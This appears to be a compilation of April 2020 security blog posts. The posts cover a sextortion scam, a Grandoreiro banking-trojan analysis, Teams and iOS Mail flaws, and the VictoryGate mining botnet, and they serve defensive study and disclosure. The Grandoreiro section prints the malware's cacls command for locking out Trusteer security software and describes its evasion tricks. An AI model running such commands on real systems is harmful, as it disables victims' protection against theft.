Sextortion scammers still shilling with stolen passwords

The email includes the potential victim’s password as evidence of a hack, but there is more than meets the eye

Earlier in April, a new sextortion scam campaign was detected making the rounds in countries on both sides of the Atlantic. The spam emails that were detected by ESET’s research laboratory have been trying to dupe unwitting victims by referring to old passwords that have been part of old data breaches.

The campaign is not altogether new, since it repurposes old scams. The first time that scammers made waves with these tactics was in 2018 with a campaign that also included the victim’s password in the subject line. The email itself claimed that the password was obtained by compromising one of the recipient’s devices using malware.

However frightening this may seem at first glance, these are just social engineering and scare tactics, employed by cybercriminals to generate panic in the recipients of these emails. To put it simply, it is highly unlikely that your computer has either been accessed or compromised, at least not by the method suggested in the email, so there is no need to panic.

In fact, a similar campaign has been spotted recently by ESET researchers: it rehashed the content to reflect the current pandemic situation and includes a threat to infect the victim’s whole family with coronavirus.

The new extortion campaign borrows, or rather builds upon, the previous versions. The scammers start with an alarming message right off the bat to get the victim’s attention, usually by including one of the victim’s old passwords that was probably stolen as part of a previous data breach. Moving on, the fraudsters claim that the victim’s device was infected by some form of malware when visiting a porn website, and that allowed them to obtain both the victim’s password and access to their device. The scammers then purport to have made a video of the victim and the alleged “not safe for work” content.

Once the cybercriminals have scared their potential victims enough, they demand a sum to be paid within 24 hours or the embarrassing video will be released. They usually want the payment to be made in bitcoin.

After analyzing some of the cases stemming from this new sextortion scam campaign, ESET researchers found that it probably started sometime around the 8th or 9th of April. They checked the bitcoin wallet addresses shared by the attackers and found that they weren’t faring very well, to put it mildly. By contrast, during the 2018 campaign the scammers were able to trick victims out of almost half a million dollars.

To reiterate, it is important to note that the password did not come from the potential victim’s compromised machine. All of the breadcrumbs indicate that the campaign leverages credentials taken from large data leaks and older breaches, which, unfortunately, aren’t a rare occurrence. ESET researchers entered some of the victims’ email addresses into the Have I Been Pwned? website, and indeed found that their passwords and emails were gathered from services that suffered data breaches such as LinkedIn, Taringa, MyFitnessPal or Canva, among others.

What can I do?

Before you fly into a frenzy, you should take a step back and think about the whole scam. Have you ever visited a porn site? If the answer is no, well, you know the email is fake and you have nothing to worry about. And even if you did (and it’s safe to say you weren’t alone), at best it could be embarrassing to you if the secret were revealed. But to reiterate, the cybercriminals have no evidence whatsoever, video or otherwise, of a potential victim’s intended activities.

Another thing you can do is use Google or whatever search engine you prefer and enter the word scam, in quotes, along with an interesting phrase from the scam email. You can then scroll through the results, of which there may be a few thousand, and see if anything seems vaguely familiar. Quite often you will find examples of similar scams that have been floating about and have already been scrutinized by a number of researchers and experts in the field.

If you’re still not sure what you’re dealing with you can check out a list of other steps compiled by ESET researcher Bruce P. Burrell.

30 Apr 2020 – 11:30AM

ESET Threat Report

A view of the Q1 2020 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

The first quarter of 2020 was, without a doubt, defined by the outbreak of COVID-19 – now a pandemic that has put much of the world under lockdown, disrupting people’s lives in unprecedented ways.

In the face of these developments, many businesses were forced to swiftly adopt work-from-home policies, thereby facing numerous new challenges. The soaring demand for remote access and videoconferencing applications has attracted cybercriminals who quickly adjusted their attack strategies to profit from the shift.

Cybercriminals also haven’t hesitated to exploit public concerns surrounding the pandemic. In March 2020, we saw a surge in scam and malware campaigns using the coronavirus pandemic as a lure, trying to capitalize on people’s fears and hunger for information.

Even under lockdown, our analysts, detection engineers and security specialists continued to keep a close eye on this quarter’s developments. Some threat types – such as cryptominers or Android malware – saw a decrease in detections when compared with the previous quarter; others – such as web threats or stalkerware – were on the rise. Web threats in particular have seen the largest increase in terms of overall numbers of detections, a possible side effect of coronavirus lockdowns.

The researchers in ESET’s Research Labs also did not stop investigating threats – Q1 saw them dissect obfuscation techniques in Stantinko’s new cryptomining module; detail the workings of advanced Brazil-targeting banking trojan Guildma; uncover new campaigns by the infamous Winnti Group and Turla; and uncover Kr00k, a previously unknown vulnerability affecting the encryption of over a billion Wi‑Fi devices.

Before lockdowns became the new normal, experts from ESET Research Labs were sharing their insights at security conferences and events around the world. In February, they unveiled the Kr00k vulnerability research and led a workshop for hunting Linux malware at RSA Conference 2020, and presented two talks at BlueHat IL.

Follow ESET research on Twitter for regular updates on key trends and top threats.

29 Apr 2020 – 02:00PM

Grandoreiro: How engorged can an EXE get?

Another in our occasional series demystifying Latin American banking trojans

In this installment of our series, we introduce Grandoreiro, a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

We have seen Grandoreiro being distributed solely through spam. The authors usually utilize a fake Java or Flash update, but recently, perhaps unsurprisingly, we have observed their spam abusing the fear around COVID-19 as well.

We have named this malware family based on its most notable characteristic – its binaries being bloated to at least a few hundred megabytes. Its development is quite rapid and feature changes and additions are happening very often. In this blogpost, we will focus on the most noteworthy.

Characteristics

Grandoreiro is another Delphi-written Latin American banking trojan we have identified during our research. Grandoreiro has been active at least since 2017 targeting Brazil and Peru, expanding to Mexico and Spain in 2019 (see Figure 1 for a current detection heat map). The fact that it attacks its victims by displaying fake pop-up windows that try to persuade victims to divulge sensitive information should come as no surprise to anyone who has read the previous pieces in the series.

Figure 1. Heat map showing ESET’s detections of Grandoreiro.

Grandoreiro, as with any other Latin American banking trojan, employs backdoor functionality, being capable of:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine
  • blocking access to chosen websites

Persistence is ensured by creating a .LNK file in the Windows startup directory. Of importance is the fact that Grandoreiro uses the same algorithm for decrypting its internal strings as Casbaneiro. We believe this is due to information sharing between authors of banking trojans in Latin America.

Grandoreiro collects the following information about its victims:

  • computer name
  • username
  • operating system version and bitness
  • whether Diebold Warsaw GAS Tecnologia (an application, popular in Brazil, to protect access to online banking) is installed
  • list of installed security products

In some versions, it also steals credentials stored in the Google Chrome web browser and data stored in Microsoft Outlook.

The authors of Grandoreiro seem to be developing the banking trojan very rapidly, as we observe at least several new versions each month. We also suspect they are developing at least two variants simultaneously.

The authors seem to focus mainly on two areas. The first is hiding the actual C&C address using the Domain Generation Algorithm (DGA) described in next section. The second is making the banking trojan modular. This is an interesting approach as the authors first introduced separate Delphi forms for each bank targeted (which is quite common), but lately even created separate DLLs for each targeted bank. We have not seen this approach in any other Latin American banking trojan we have analyzed.

DGA

Grandoreiro’s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Those values are processed by a simple algorithm yielding a result in the form https://sites.google[.]com/view/%DATA%, where %DATA% is the generated string (we provide pseudocode in Figure 2). The C&C domain and port are used as the site title, as you can see in Figure 3. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet.

Figure 2. Pseudocode of Grandoreiro’s DGA

Figure 3. Example of a Google site set up by authors of Grandoreiro (translation: “Title of your page”)

Configuration data

In older versions of Grandoreiro, there was a small .ini file distributed alongside the banking trojan that served as a primitive configuration file, containing only a version identifier and an index into a table in the binary that decided which C&C server should be used.

Lately, the configuration mechanism has been changed and is now stored in the Windows Registry at HKCU\Software under keys named like %USERNAME% and ToolTech-RM. Those names, as well as the names of values they contain, change frequently, but the information contained consists of:

  • an identifier unique for each victim (generated via CoCreateGuid API)
  • executable name and path
  • geolocation of the victim (retrieved via http://ipinfo.io/json)
  • strings necessary for creating and deleting the startup .LNK file
  • notes specific to the victim device (the C&C operator supplies these, if any, via a backdoor command)
  • flags to indicate an action has already been performed, such as
    • stealing Google Chrome stored credentials
    • stealing Outlook data

C&C communication

Grandoreiro implements communication with its C&C server using the RealThinClient SDK. This component uses a protocol that operates over HTTP. After connecting to the server, Grandoreiro performs a handshake and then periodically checks for commands every few seconds. If the trojan misses a check, the server drops the connection.

As we described in our Botconf presentation in December 2019, and as reported recently by SonicWall, there is a very interesting thing about the first “command” received from the C&C server. It is always a list of all currently connected victims, including all the collected information about their machines, as you can see in Figure 4. Note that not all the victims are identified by a string with the same format. Due to Grandoreiro’s rapid development, this string changes quite often, but victims compromised with different variants still connect to the same C&C server.

Figure 4. C&C server responding to initial Grandoreiro connection with a list of currently connected victims.

Distribution

Spam seems to be the sole distribution method for Grandoreiro. The spam emails appear to contain a link pointing to a website offering fake Flash or Java updates (see Figure 5). Notice the red arrow in the lower left corner, tailored for the Google Chrome web browser but displayed in other browsers too. We have seen Grandoreiro abusing the fear around COVID-19 as well (see Figure 6), as we already announced on our @ESETresearch Twitter account.

Figure 5. Fake Flash (left) and Java (right) update websites (the left checkbox states that the user agrees with terms and conditions; the text on the right urges the user to install the latest version of Java to avoid issues with security and vulnerabilities)

Figure 6. Fake COVID-19 website. Clicking the video leads to the ZIP archive being downloaded (translation: “Construction of 2 hospitals in 7 days: accelerated video shows construction of hospital in china in 7 days”)

Unlike the majority of Latin American banking trojans, Grandoreiro utilizes quite small distribution chains. For different campaigns, it may choose a different type of downloader, as we illustrate in Figure 7. These downloaders are often stored on well-known public online sharing services such as GitHub, Dropbox, Pastebin, 4shared and 4Sync.

Figure 7. Possible ways that Grandoreiro distribution chains may appear (different colors show different paths the chain may take). The final ZIP archive may be encrypted and in some cases also protected by a password.

The final payload is a ZIP archive that is usually encrypted by the algorithm shown in Figure 8 and, in a significant number of cases, we saw it being password-protected as well.

Figure 8. Pseudocode of the archive decryption algorithm used by Grandoreiro

Distributing the final payload in a ZIP archive is very common among these banking trojans, but in the case of Grandoreiro, it holds extra importance, as you will see in the next section.

Binary padding

The vast majority of Grandoreiro samples utilize a very interesting application of the binary padding technique. This technique is all about making the binaries large and we have seen it being used even by more sophisticated malware. We have also observed some other Latin American banking trojans employing it occasionally, but only in the simplest form of appending a large amount of junk at the end of the binary.

Grandoreiro chooses a different approach – a simple, yet very effective one. The resources section of the PE file is augmented by (usually 3) grande BMP images, making each binary at least 300 MB in size. Notice in Figure 9 that the size of the whole EXE is 425 MB, yet the size of the code is only 4 MB and the size of the .rsrc section 419 MB (98.5% of the total size). After examining the contents of the .rsrc section, we see three images with sizes of 112 MB, 112 MB and 105 MB respectively (taking up 78.5% of the section size). We provide examples of such images in Figure 10.

Figure 9. Details of a Grandoreiro binary. Several Grandoreiro binaries are shown left. The rest shows details of one such binary.

Figure 10. BMP images used by Grandoreiro for binary padding. Their artistic “style” suggests the malware’s authors create them manually.

Because of the structure of those BMP files, compressing the binary into a ZIP archive yields a file of only a few MB, making it much easier to distribute the payload. The BMP files seem to change frequently, most likely to avoid detection. The images shown in Figure 10 come from three different builds of Grandoreiro. The visible similarities lead us to believe the authors update the images manually.

Let us look at the possible outcomes of this technique because, even though it is very simple, it is surprisingly effective. The upload file size limit on VirusTotal was changed to 550 MB during 2019, but used to be 256 MB, so until then a victim was unable to scan such a file using that platform. Working with such a huge file is harder in general, making any automated or manual analyses much slower. At the same time, it is very hard to get rid of these large images while keeping a valid PE file, and by discarding the whole .rsrc section, interesting information such as the fake pop‑up windows is lost.
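The padding described above leaves a measurable fingerprint: a .rsrc section that dominates the file and that compresses to almost nothing. The script below is an added triage example (not ESET’s code); it parses the PE section table with only the standard library, reports the .rsrc share and its zlib compressibility, and flags Grandoreiro-like samples. The thresholds and the in-memory sample PE are constructed assumptions for the demonstration.

```python
"""Triage heuristic for Grandoreiro-style binary padding (added example).

Parses the PE section table directly (no pefile dependency), then reports
how much of the file the .rsrc section occupies and how compressible it is.
Huge, highly compressible resources match the BMP padding described in the
article (419 MB of .rsrc in a 425 MB EXE that zips down to a few MB).
"""
import struct
import zlib

SECTION_HEADER_SIZE = 40  # IMAGE_SECTION_HEADER is always 40 bytes


def is_pe(data: bytes) -> bool:
    """Cheap sanity check: MZ stub plus a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def parse_sections(data: bytes) -> list:
    """Return one dict per section header: name, raw offset and raw size."""
    if not is_pe(data):
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    coff = e_lfanew + 4                       # COFF file header follows the signature
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size              # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(data):
            raise ValueError("truncated section table")
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        sections.append({"name": name, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return sections


def section_bytes(data: bytes, sec: dict) -> bytes:
    return data[sec["raw_ptr"]:sec["raw_ptr"] + sec["raw_size"]]


def compress_ratio(blob: bytes) -> float:
    """zlib output size / input size; values near 0 mean the data is filler."""
    if not blob:
        return 1.0
    return len(zlib.compress(blob, 6)) / len(blob)


def assess_padding(data: bytes, share_threshold=0.9, ratio_threshold=0.05) -> dict:
    """Summarise the .rsrc section and flag padding. Thresholds are assumed
    starting points for this example; tune them on your own sample corpus."""
    sections = parse_sections(data)
    rsrc = next((s for s in sections if s["name"] == ".rsrc"), None)
    if rsrc is None:
        return {"rsrc_share": 0.0, "rsrc_compress_ratio": 1.0, "padded": False}
    blob = section_bytes(data, rsrc)
    share = len(blob) / len(data)
    ratio = compress_ratio(blob)
    return {"rsrc_share": share, "rsrc_compress_ratio": ratio,
            "padded": share >= share_threshold and ratio <= ratio_threshold}


def build_sample_pe(code: bytes, rsrc: bytes) -> bytes:
    """Constructed minimal PE with .text and .rsrc sections (not a real
    Grandoreiro sample). It has no optional header, which the parser tolerates."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)  # i386, 2 sections
    headers_len = len(dos) + 4 + len(coff) + 2 * SECTION_HEADER_SIZE
    text_ptr, rsrc_ptr = headers_len, headers_len + len(code)

    def hdr(name: bytes, raw_ptr: int, raw: bytes) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000, len(raw),
                           raw_ptr, 0, 0, 0, 0, 0x40000040)

    return (dos + b"PE\0\0" + coff + hdr(b".text", text_ptr, code)
            + hdr(b".rsrc", rsrc_ptr, rsrc) + code + rsrc)


# Constructed stand-in for a padded sample: 4 KB of "code" and a 200 KB
# single-colour "BMP" (solid zero pixels), mimicking the article's ratios.
SAMPLE = build_sample_pe(bytes(range(256)) * 16, b"BM" + bytes(200_000))

if __name__ == "__main__":
    for sec in parse_sections(SAMPLE):
        print(f"{sec['name']:<8} raw_size={sec['raw_size']}")
    print(assess_padding(SAMPLE))
```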

Self-protection & anti-emulation

For a Latin American banking trojan, Grandoreiro utilizes a surprisingly large number of tricks to evade detection and emulation. In this section, we talk about the most notable ones that appeared in several recent versions we have analyzed.

Diebold Warsaw GAS Tecnologia and Trusteer are known banking access protection software popular in Latin America. Every banking trojan described so far in our series has implemented some sort of check for these programs. Grandoreiro is no exception; it does this by

  • hooking the LdrLoadDll and LoadLibrary(Ex) APIs to prevent loading DLLs belonging to those products
  • checking if any of those modules are already loaded
  • trying to kill their running processes (based on process names)
  • blocking Diebold Warsaw on the firewall level
  • trying to break Trusteer by changing its file system path (see Figure 11)
  • changing ACLs on the main Trusteer binary by running this command twice:
    • cacls "%PROGRAM_DATA%\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportGH.dll" /T /E /C /P user:perm
    • with user:perm set to Todos:N and then Everyone:N

Figure 11. Simple BAT script used by Grandoreiro to change Trusteer file path in hopes of making it unable to execute

Besides that, it also monitors hooks on important functions. If such a function starts with 0xE9 (assembly opcode for the jmp instruction), the trojan reloads the function from the corresponding library. Based on window and process names, it also checks for tools like RegMon, RegShot, Wireshark and Process Explorer. It tries to avoid being debugged by calling the IsDebuggerPresent API and setting up a hook via SetWindowsHookEx that returns ERROR_ACCESS_DENIED on the WH_DEBUG event.

Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file. By doing so, the binary will be executed with elevated privileges. This technique no longer works on patched systems due to a fix released in 2017.

Finally, Grandoreiro detects two virtual environments – VMWare via its special I/O port and Virtual PC via the vpcext instruction. Both methods are described in detail here (techniques 1 and 2).

Spam tool

During our investigation, we discovered a tool used for Grandoreiro’s spam campaigns. It is not a tool that automatically registers a large number of email accounts, as in the case of Amavaldo and Casbaneiro; it is actually used to create and send the spam messages. It does so by utilizing the EASendMail SDK.

Besides its main purpose, the tool sets up persistence using the Windows registry Run key and disables UAC. The most probable scenario is that the attackers distribute this tool to some victims via Grandoreiro.

A small backdoor component is included and used to receive configuration files. Those files dictate what the emails will look like, what they will point to or where to send them. We provide a complete list of the configuration files and their purpose in Table 1.

Table 1. List of configuration files used by Grandoreiro’s spam tool

Filename | Purpose | Description
ID.txt | None | Seems not to be used for the spam emails
html.txt | Email body template | Template for the email body (including placeholders – those are replaced by values from other config files)
assunto.txt | Subject template (assunto = subject) | Template for subject (similar to html.txt for email body)
nomes.txt | List of fake names | Replaces [NOME] placeholder in the templates
link.txt | List of malicious URLs | The email will link to one of these
lista.txt | List of recipients | The email will be sent to all of these
login.txt | List of usernames | Information required to log into the email account that will be used to send the emails
senha.txt | List of passwords | Information required to log into the email account that will be used to send the emails
smtp.txt | SMTP server address | Information required to log into the email account that will be used to send the emails

As you can see, the tool is not fully automated, but relies completely on the configuration data. This shows a lower level of sophistication. Its implementation shows similarities with the Grandoreiro banking trojan, which is why we believe it was written by the same authors.

Conclusion

In this installment of our series, we have focused on Grandoreiro, a Latin American banking trojan known to target Brazil, Mexico, Spain and Peru. We have mentioned aspects that are typical for that type of banking trojan, such as being written in Delphi, containing backdoor functionality, targeting Latin America and using fake pop-up windows to attack its victims.

A novel feature of Grandoreiro is its great effort to evade detection. That includes many techniques to detect or even disable banking protection software. It also utilizes a very specific application of the binary padding technique we have not seen before that makes it hard to get rid of the padding while keeping a valid file.

Spam appears to be the exclusive distribution method for Grandoreiro. The emails contain a link that points victims to fake websites set up by the operators. While they usually use simple mechanisms such as fake Flash or Java updates, we have seen them exploiting the current fear of COVID-19 as well.

Grandoreiro shows similarities with other banking trojans previously described in this series, mainly Casbaneiro, with which it shares the string decryption algorithm.

For any inquiries, contact us at [email protected]. Indicators of Compromise can also be found in our GitHub repository.

Hashes

Grandoreiro banking trojan

SHA-1 | Description | ESET detection name
40FBC932BD45FEB3D2409B3A4C7029DDDE881389 | Older version of Grandoreiro (2017) | Win32/Spy.Grandoreiro.A
7905DB9BBE2CB29519A5371B175551C6612255EF | Grandoreiro | Win32/Spy.Grandoreiro.AE
BD88A809B05168D6EFDBA4DC149653B0E1E1E448 | Grandoreiro | Win32/Spy.Grandoreiro.AJ

Grandoreiro Win32 downloaders

SHA-1 | Description | ESET detection name
7C2ED8B4AA65BEFCC229A36CE50539E9D6A70EE3 | Grandoreiro downloader | Win32/TrojanDownloader.Banload.YJR
27A434D2EF4D1D021F283BCB93C6C7E50ACB8EA6 | Grandoreiro downloader | Win32/TrojanDownloader.Banload.YLZ
28D58402393B6BCA73FF0EAC319226233181EDC9 | Grandoreiro downloader | Win32/TrojanDownloader.Banload.YJB
42892DF64F00F4C091E1C02F74C2BB8BAD131FC5 | Grandoreiro downloader | Win32/TrojanDownloader.Banload.YMI

Grandoreiro spam tool

SHA-1 | Description | ESET detection name
BCED5D138ACEADA1EF11BFD22C2D6359CDA183DB | Grandoreiro spam tool | Win32/Spy.Grandoreiro.AD

Windows Registry

  • HKCU\Software\%USER_NAME%
  • HKCU\Software\ToolTech-RM

User-Agent

  • h55u4u4u5uii5

Filenames

  • %INSTALL_DIR% *
    • MDL_YEL_01.dll
    • MDL_BLU_BR_02.dll
    • MDL_SIC_BR_03.dll
    • MDL_SANT_BR_04.dll
    • MDL_ITA_BR_05.dll
    • MDL_BRADA_BR_06.dll
    • MDL_SICCB_BR_07.dll
    • MDL_SAFRA_BR_08.dll
    • MDL_ORIGI_BR_09.dll
    • MDL_NORDES_BR_10.dll
    • MDL_BANEST_BR_11.dll
    • MDL_BANEZE_BR_12.dll
    • MDL_AMAZON_BR_13.dll
    • MDL_UNICRE_BR_14.dll
    • MDL_BRB_BR_15.dll
    • MDL_WUPDATE_BR_001.dll

*%INSTALL_DIR% is the path where Grandoreiro is installed

MITRE ATT&CK techniques

Tactic | ID | Name | Description
Initial Access | T1192 | Spearphishing Link | Grandoreiro distribution chains start with an email link pointing to a fake website.
Execution | T1106 | Execution through API | Grandoreiro is executed either by WinExec or WScript.Shell.Exec API.
Persistence | T1060 | Registry Run Keys / Startup Folder | Grandoreiro ensures persistence by creating a .LNK file in the startup folder.
Privilege Escalation | T1088 | Bypass User Account Control | Grandoreiro bypasses UAC by registering as the default handler for .MSC files.
Defense Evasion | T1009 | Binary Padding | Grandoreiro inserts large BMP files into its .rsrc section to make the binaries much larger.
Defense Evasion | T1089 | Disabling Security Tools | Grandoreiro tries to disable Diebold Warsaw and Trusteer banking protection software.
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Grandoreiro is distributed in a ZIP archive that usually needs to be decrypted.
Defense Evasion | T1222 | File and Directory Permissions Modification | Grandoreiro changes the ACL for Trusteer to disable it.
Defense Evasion | T1036 | Masquerading | Downloaders that distribute Grandoreiro masquerade as fake update installation files.
Defense Evasion | T1112 | Modify Registry | Grandoreiro stores its configuration in the Windows registry.
Defense Evasion | T1064 | Scripting | Grandoreiro implements some of its distribution chain stages in VBScript.
Defense Evasion | T1497 | Virtualization/Sandbox Evasion | Grandoreiro detects VMWare and Virtual PC.
Credential Access | T1503 | Credentials from Web Browsers | Grandoreiro steals credentials from the Google Chrome browser.
Credential Access | T1081 | Credentials in Files | Grandoreiro parses Outlook .pst files to extract email addresses.
Discovery | T1010 | Application Window Discovery | Grandoreiro discovers various security tools based on window names.
Discovery | T1083 | File and Directory Discovery | Grandoreiro discovers protection software based on file system paths.
Discovery | T1057 | Process Discovery | Grandoreiro discovers security tools based on process names.
Discovery | T1063 | Security Software Discovery | Grandoreiro detects the presence of banking protection products.
Discovery | T1082 | System Information Discovery | Grandoreiro collects information about the victim’s machine, such as %USERNAME%, %COMPUTERNAME%, and product names.
Collection | T1056 | Input Capture | Grandoreiro is capable of capturing keystrokes.
Command and Control | T1483 | Domain Generation Algorithms | Grandoreiro generates its C&C address using a DGA.
Command and Control | T1071 | Standard Application Layer Protocol | Grandoreiro’s network protocol is implemented by RealThinClient, which is built over HTTP.
Exfiltration | T1041 | Exfiltration Over Command and Control Channel | Grandoreiro sends the data it retrieves to its C&C server.

28 Apr 2020 – 11:30AM

Microsoft Teams flaw could let attackers hijack accounts

Microsoft plugs a security hole that could have enabled attackers to weaponize a GIF in order to hijack Teams accounts and steal data

Microsoft has fixed a security flaw in Microsoft Teams that, if left unattended, could have been exploited to take over user accounts. By hijacking a Teams account, the bad actors might eventually traverse through the organization and gather data from the Teams accounts ranging from confidential information, passwords and business plans, among other things, according to researchers from CyberArk.

With companies recently forced to switch to working remotely due to the COVID-19 pandemic, their IT departments were faced with a challenge on how to make the switch to home office safe. Resolving communication was a cornerstone issue, with a large number opting to use one of the premier platforms such as Zoom, Microsoft Teams, or Slack. This has, in turn, put the platforms and their users in the crosshairs of cybercriminals.

CyberArk has now described a possible attack scenario: “We found that by leveraging a sub-domain takeover vulnerability in Microsoft Teams, attackers could have used a malicious GIF to scrape user’s data and ultimately take over an organization’s entire roster of Teams accounts.” The sub-domains that were vulnerable to takeover were aadsync-test.teams.microsoft.com and data-dev.teams.microsoft.com.

“If an attacker can somehow force a user to visit the sub-domains that have been taken over, the victim’s browser will send this cookie to the attacker’s server and the attacker (after receiving the authtoken) can create a skype token. After doing all of this, the attacker can steal the victim’s Teams account data,” reads the article.

Exploitation of the vulnerability would have involved sending the victims a malicious GIF file. Worryingly, even viewing the GIF would have been enough to be affected, and the attack could spread automatically, in a worm-like fashion. The flaw is said to have been present in both the desktop and web browser versions of Teams.

CyberArk disclosed its findings to Microsoft on March 23rd, with the tech giant acting quickly and correcting the misconfigured Domain Name System (DNS) records on the same day. On April 20th, Microsoft issued a patch for Teams. Apparently, no attacks were spotted in the wild.

Zoom, one of Teams’ key competitors in the communication and collaboration arena, has had its share of privacy and security issues of late. Also, those findings came after half a million Zoom accounts were offered for sale on the dark web, although this was not due to any kind of breach of Zoom’s defenses.

27 Apr 2020 – 06:55PM

Week in security with Tony Anscombe

ESET research into vulnerabilities in smart home hubs – Discovering and disrupting a botnet in Latin America – Digital assistants in the work-from-home era

ESET’s IoT research team has identified severe vulnerabilities in several smart home hubs that, if exploited, could give attackers full remote access to the central and peripheral devices connected to them. Also this week, ESET researchers disclosed their findings about a botnet that was made up of some 35,000 compromised devices in Latin America – until the researchers helped take it down. How do digital assistants come into play in the current work-from-home era? All this – and more – on WeLiveSecurity.com.

iOS Mail app flaws may have left iPhone users vulnerable for years

A pair of vulnerabilities in the default email app on iOS devices is believed to have been exploited against high-profile targets

Apple’s iOS Mail app, which comes pre-installed on all iOS devices, has been found to contain two severe security vulnerabilities that, if exploited, could enable hackers to steal the victims’ data.

In fact, the attackers have leveraged these flaws for attacks against various targets, including a European journalist, a Japanese executive, and individuals from an undisclosed Fortune 500 company among others, said ZecOps researchers, who uncovered the flaws. Some of the attacks are thought to go back all the way to January 2018.

“Successful exploitation of this vulnerability would allow the attacker to leak, modify, and delete emails. Additional kernel vulnerability would provide full device access – we suspect that these attackers had another vulnerability,” said the company.

The security flaws allow attackers to remotely compromise a device by sending an email that will consume high amounts of the device’s memory – without actually requiring a large email to do so. The vulnerability can be triggered before the whole email is downloaded, although the trigger varies depending on the iOS version the device is running.

On devices running iOS 13, the vulnerability is triggered by an unassisted attack, also known as a ‘zero-click’ attack, which means the Mail app has to be running in the background. On iOS 12, meanwhile, the victim would have to click on the email. These aren’t the only two iOS versions vulnerable; devices running iOS 6 and above are all susceptible to the attack, while older versions haven’t been checked.

Once the vulnerability has been exploited, on iOS 12 the email app would appear to be sluggish and sometimes even crash. On iOS 13, it would manifest as a temporary slowdown of the mail app. In case of a failed attack, the emails sent by the hacker would show “This message has no content.”

ESET Security Specialist Jake Moore said that the flaw is unlikely to have been used to target people en masse: “For complete remote access to occur under the radar it will have most likely been used for highly-targeted attacks on high-profile victims. Although this is a very professionally designed secret hack, it would be very unlikely that it was used en masse. Some flaws are kept even further underground amongst cybercriminals and keep certain exclusive vulnerabilities to themselves, so law enforcement and developers are kept in the dark – hence this particular defect has not been spotted for years. This particular flaw will be patched in the next update, so make sure you have your phone set to auto-update to the next version.”

The researchers alerted Apple to the two vulnerabilities and it has developed a fix, which is currently available only in the iOS 13.4.5 beta. Since beta versions are mainly aimed at developers, the patch is not yet available to most users. For the time being, you can mitigate the issue by using another email client.

Last year, Apple had to rush a fix for a FaceTime spying bug.

23 Apr 2020 – 07:54PM

Following ESET’s discovery, a Monero mining botnet is disrupted

ESET researchers discover, and play a key role in the disruption of, a 35,000-strong botnet spreading in Latin America via infected USB drives

ESET researchers recently discovered a previously undocumented botnet that we have named VictoryGate. It has been active since at least May 2019 and, since then, three different variants of the initial module have been identified, in addition to approximately 10 secondary payloads that are downloaded from file hosting websites. The initial module is detected by ESET security products as MSIL/VictoryGate.

This botnet is composed mainly of devices in Latin America, specifically Peru, where over 90% of the compromised devices are located. We’ve been actively sinkholing several command and control (C&C) domains, allowing us to monitor this botnet’s activity. The combination of the sinkhole data and our telemetry data allows us to estimate the botnet’s size to be at least 35,000 devices.

To control its botnet, VictoryGate used only subdomains registered at the dynamic DNS provider No-IP. ESET reported the malicious subdomains to No-IP, who swiftly took them all down, effectively removing control of the bots from the attacker. Also, ESET is collaborating with non-profit Shadowserver Foundation by sharing sinkhole logs in an effort to further remediate this threat.

In Figure 1 you can see the peak number of unique IP addresses connecting to the C&C per day.

Figure 1. Connections to the C&C

The main activity of the botnet was Monero mining. However, given that the botmaster was able to issue commands to the nodes to download and execute new secondary payloads at any given time, this could have changed at some point. This posed a considerable risk, given that we’ve identified compromised network traffic that stems from the public sector and from organizations in the private sector, including financial institutions.

The impacts on the victim’s device are:

- Very high resource usage. In all the payloads we analyzed, the malicious code uses all available threads to perform cryptomining, which results in a sustained 90-99% CPU load. This slows down the device, causes overheating and possibly even damage.
- Files stored on USB drives are hidden when the drive is connected to an infected machine. This is part of the propagation mechanism that we’ll discuss shortly.

We’ll cover some of the technical aspects of this threat in this post.

What is VictoryGate?

This is the name we’ve given to the initial module that receives and executes commands from the C&C server. It also implements the propagation mechanism and establishes persistence on victim devices.

Propagation

The only propagation vector we have been able to confirm is through removable devices. The victim receives a USB drive that at some point was connected to an infected machine. It seemingly has all the files with the same names and icons that it contained originally. Because of this, the contents will look almost identical at first glance, as seen in the example in Figure 2. However, the original files have been copied to a hidden directory in the root of the drive and Windows executables have been provided as apparent namesakes.

Figure 2. Comparison of a drive pre- and post-compromise with default Explorer options

In fact, these executables are AutoIt scripts that are compiled on the fly by VictoryGate, using the template in Figure 3. It is worth noting that the build process will also add random metadata to each file so that any two compiled scripts will most likely never have the same hash.

Figure 3. The template used by VictoryGate to compile the propagation scripts

When an unsuspecting user “opens” (i.e. executes) one of these files, the AutoIt script launches both the file the user intended to open and the initial module (see Figure 4), both of which VictoryGate keeps in the hidden directory mentioned above.

Figure 4. Propagation script that shows launching a regular file along with executing the malicious module

Once the initial module is executed, it will create a copy of itself in %AppData% (with a nicer name like ctfmon2.exe) and a shortcut in the startup folder pointing to this copy, as a simple mechanism to gain persistence upon system boot.
